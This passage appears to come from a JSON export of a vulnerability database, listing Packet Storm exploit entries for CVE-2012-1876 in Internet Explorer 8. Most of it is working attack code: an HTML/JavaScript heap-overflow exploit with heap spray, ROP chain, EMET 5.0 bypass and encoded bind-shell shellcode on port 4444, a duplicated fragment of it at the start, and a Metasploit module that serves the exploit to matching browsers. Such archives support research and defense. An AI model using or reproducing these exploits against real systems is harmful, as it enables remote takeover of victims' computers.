unescape(\"%u9090%u9090\"); // NOPs \n// EMET disable part 0x02 end \n \n// Bind shellcode on 4444 :) \n// msf > generate -t js_le \n// windows/shell_bind_tcp - 342 bytes \n// http://www.metasploit.com \n// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, \n// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= \n// I would keep the shellcode the same size for better reliability :) \n \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n// Total spray should be 1000 \nvar padding = unescape(\"%u9090\"); \nwhile (padding.length < 1000) \npadding = padding + padding; \nvar padding = padding.substr(0, 1000 - shellcode.length); \n \nshellcode+= padding; \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nvar hex = str_addr.toString(16); \n//alert(hex); \nsetTimeout(function(){heapspray(str_addr)}, 50); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1245880\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 400); \nsetTimeout(function(){get_leak()},450); \nsetTimeout(function(){trigger_overflow()}, 700); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127316/iecolspan-bypass.txt"}, {"lastseen": "2016-12-05T22:20:50", "description": "", "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128476", "href": "https://packetstormsecurity.com/files/128476/Internet-Explorer-8-Fixed-Col-Span-ID-Full-ASLR-DEP-And-EMET-5.0-Bypass.html", "sourceData": "`<!-- \n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass \n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin \n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e \n** Affected Software: Internet Explorer 8 \n** Vulnerability: Fixed Col Span ID \n** CVE: CVE-2012-1876 \n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0 \n--> \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2228408; // POP ECX \nvar rop = rop.toString(16); \nvar rop25 = rop.substring(4,8); \nvar rop26 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1586172; // POP EAX \nvar rop = rop.toString(16); \nvar rop27 = rop.substring(4,8); \nvar rop28 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] \nvar rop = rop.toString(16); \nvar rop29 = rop.substring(4,8); \nvar rop30 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1884912; // PUSH EAX \nvar rop = rop.toString(16); \nvar rop31 = rop.substring(4,8); \nvar rop32 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2140694; // ADD EAX,ECX \nvar rop = rop.toString(16); \nvar rop33 = rop.substring(4,8); \nvar rop34 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX \nvar rop = rop.toString(16); \nvar rop35 = rop.substring(4,8); \nvar rop36 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5036248; // ADD ESP,0C \nvar rop = rop.toString(16); \nvar rop37 = rop.substring(4,8); \nvar rop38 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX \nvar rop = rop.toString(16); \nvar rop39 = rop.substring(4,8); \nvar rop40 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI \nvar rop = rop.toString(16); \nvar rop41 = rop.substring(4,8); \nvar rop42 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX \nvar rop = rop.toString(16); \nvar rop43 = rop.substring(4,8); \nvar rop44 = rop.substring(0,4); // } RET \n \nvar getmodulew = cbuttonlayout + 4840; // GetModuleHandleW \nvar getmodulew = getmodulew.toString(16); \nvar getmodulew1 = getmodulew.substring(4,8); \nvar getmodulew2 = getmodulew.substring(0,4); // } RET \n \n \nvar shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141\"); // PADDING \n \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN \n \n// EMET disable part 0x01 \n// Implement the Tachyon detection grid to overcome the Romulan cloaking device. \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr \nshellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument) \nshellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later) \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT) \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT) \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched) \nshellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later) \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0000%u0000\"); // NULL \nshellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN \n// EMET disable part 0x01 end \n \n// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \n \n// Store various pointers here \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u14eb\"); // NOPs \nshellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer \nshellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack* \nshellcode+= \"EMET\"; // EMET string \nshellcode+= unescape(\"%u0000%u0000\"); // EMET string \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// Store various pointers here \n \n// EMET disable part 0x02 \n// MOV EAX,DWORD PTR DS:[076D10BCH] \n// MOV ESI,DWORD PTR [EAX+518H] \n// SUB ESP,2CCH \n// MOV DWORD PTR [ESP],10010H \n// MOV EDI,ESP \n// MOV ECX,2CCH \n// ADD EDI,4 \n// SUB ECX,4 \n// XOR EAX,EAX \n// REP STOS BYTE PTR ES:[EDI] \n// PUSH ESP \n// PUSH 0FFFFFFFEH \n// CALL ESI \nshellcode+= unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" + \n\"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" + \n\"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" + \n\"%ufe6a%ud6ff\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// EMET disable part 0x02 end \n \n// Bind shellcode on 4444 :) \n// msf > generate -t js_le \n// windows/shell_bind_tcp - 342 bytes \n// http://www.metasploit.com \n// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, \n// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= \n// I would keep the shellcode the same size for better reliability :) \n \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n// Total spray should be 1000 \nvar padding = unescape(\"%u9090\"); \nwhile (padding.length < 1000) \npadding = padding + padding; \nvar padding = padding.substr(0, 1000 - shellcode.length); \n \nshellcode+= padding; \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nvar hex = str_addr.toString(16); \n//alert(hex); \nsetTimeout(function(){heapspray(str_addr)}, 50); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1245880\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 400); \nsetTimeout(function(){get_leak()},450); \nsetTimeout(function(){trigger_overflow()}, 700); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128476/ie8-bypass.txt"}, {"lastseen": "2016-12-05T22:16:44", "description": "", "published": "2012-08-01T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2012-08-01T00:00:00", "id": "PACKETSTORM:115155", "href": "https://packetstormsecurity.com/files/115155/Microsoft-Internet-Explorer-Fixed-Table-Col-Span-Heap-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:os_name => OperatingSystems::WINDOWS, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:rank => NormalRanking, # reliable memory corruption \n:javascript => true \n}) \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow', \n'Description' => %q{ \nThis module exploits a heap overflow vulnerability in Internet Explorer caused \nby an incorrect handling of the span attribute for col elements from a fixed table, \nwhen they are modified dynamically by javascript code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Alexandre Pelletier', # Vulnerability analysis \n'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module \n'binjo', # Metasploit module \n'sinn3r', # Help with the Metasploit module \n'juan' # Help with the Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-1876' ], \n[ 'OSVDB', '82866'], \n[ 'BID', '53848' ], \n[ 'MSB', 'MS12-037' ], \n[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3 with msvcrt ROP', \n{ \n'Rop' => :msvcrt \n} \n], \n[ 'IE 8 on Windows 7 SP1', \n{ \n'Rop' => :jre \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 12 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/ \nreturn targets[1] #IE 8 on Windows XP SP3 \nelsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/ \nreturn targets[2] #IE 8 on Windows 7 with JRE \nelse \nreturn nil \nend \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\").first \nend \n \ndef nop \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef get_payload(t) \n \ncode = payload.encoded \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nexec_size = code.length \nrop = \n[ \n0x77c4ec01, # retn \n0x77c4ec00, # pop ebp; retn \n0x77c15ed5, # xchg eax,esp; retn (pivot) \n0x77c4e392, # pop eax; retn \n0x77c11120, # <- *&VirtualProtect() \n0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn \njunk, \n0x77c2dd6c, \n0x77c4ec00, # pop ebp; retn \n0x77c35459, # ptr to 'push esp; ret' \n0x77c47705, # pop ebx; retn \nexec_size, # ebx \n0x77c3ea01, # pop ecx; retn \n0x77c5d000, # W pointer (lpOldProtect) (-> ecx) \n0x77c46100, # pop edi; retn \n0x77c46101, # rop nop (-> edi) \n0x77c4d680, # pop edx; retn \n0x00000040, # newProtect (0x40) (-> edx) \n0x77c4e392, # pop eax; retn \nnop, # nops (-> eax) \n0x77c12df9 # pushad; retn \n].pack(\"V*\") \nwhen :jre \nprint_status(\"Using JRE ROP\") \nexec_size = code.length \nrop = \n[ \n0x7c346c0b, # retn \n0x7c36f970, # pop ebp; retn \n0x7c348b05, # xchg eax,esp; retn (pivot) \n0x7c36f970, # pop ebp; retn [MSVCR71.dll] \n0x7c36f970, # skip 4 bytes [MSVCR71.dll] \n0x7c34373a, # pop ebx ; retn [MSVCR71.dll] \nexec_size, # ebx \n0x7c3444d0, # pop edx ; retn [MSVCR71.dll] \n0x00000040, # 0x00000040-> edx \n0x7c361829, # pop ecx ; retn [MSVCR71.dll] \n0x7c38f036, # &Writable location [MSVCR71.dll] \n0x7c342766, # pop edi ; retn [MSVCR71.dll] \n0x7c346c0b, # retn (rop nop) [MSVCR71.dll] \n0x7c350564, # pop esi ; retn [MSVCR71.dll] \n0x7c3415a2, # jmp [eax] [MSVCR71.dll] \n0x7c3766ff, # pop eax ; retn [MSVCR71.dll] \n0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll] \n0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll] \n0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll] \n].pack(\"V*\") \nend \n \ncode = rop + code \nreturn code \nend \n \ndef on_request_uri(cli, request) \n \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"Browser not supported: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \njs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch)) \n \ntable_builder = '' \n \n0.upto(132) do |i| \ntable_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >  </col></table>\" \nend \n \n# About smash_vtable(): \n# * smash the vftable 0x07070024 \n# * span => the amount to overwrite \njs_element_id = Rex::Text.rand_text_alpha(4) \nspray_trigger_js = <<-JS \n \nvar dap = \"EEEE\"; \nwhile ( dap.length < 480 ) dap += dap; \n \nvar padding = \"AAAA\"; \nwhile ( padding.length < 480 ) padding += padding; \n \nvar filler = \"BBBB\"; \nwhile ( filler.length < 480 ) filler += filler; \n \nvar arr = new Array(); \nvar rra = new Array(); \n \nvar div_container = document.getElementById(\"#{js_element_id}\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nrra[i] = dap.substring(0, (0x100-6)/2); \narr[i] = padding.substring(0, (0x100-6)/2); \narr[i+1] = filler.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nrra[i] = null; \nCollectGarbage(); \n} \n \nfunction heap_spray(){ \nCollectGarbage(); \n \nvar shellcode = unescape(\"#{js_code}\"); \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \nvar onemeg = shellcode.substr(0, 64*1024/2); \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \nvar spray = new Array(); \n \nfor (i=0; i<400; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction smash_vtable(){ \nvar obj_col_0 = document.getElementById(\"132\"); \nobj_col_0.width = \"1178993\"; \nobj_col_0.span = \"44\"; \n} \n \nsetTimeout(function(){heap_spray()}, 400); \nsetTimeout(function(){smash_vtable()}, 700); \nJS \n \nif datastore['OBFUSCATE'] \nspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js) \nspray_trigger_js.obfuscate \nend \n \n# build html \ncontent = <<-HTML \n<html> \n<body> \n<div id=\"#{js_element_id}\"></div> \n#{table_builder} \n<script language='javascript'> \n#{spray_trigger_js} \n</script> \n</body> \n</html> \nHTML \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/115155/ms12_037_ie_colspan.rb.txt"}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], 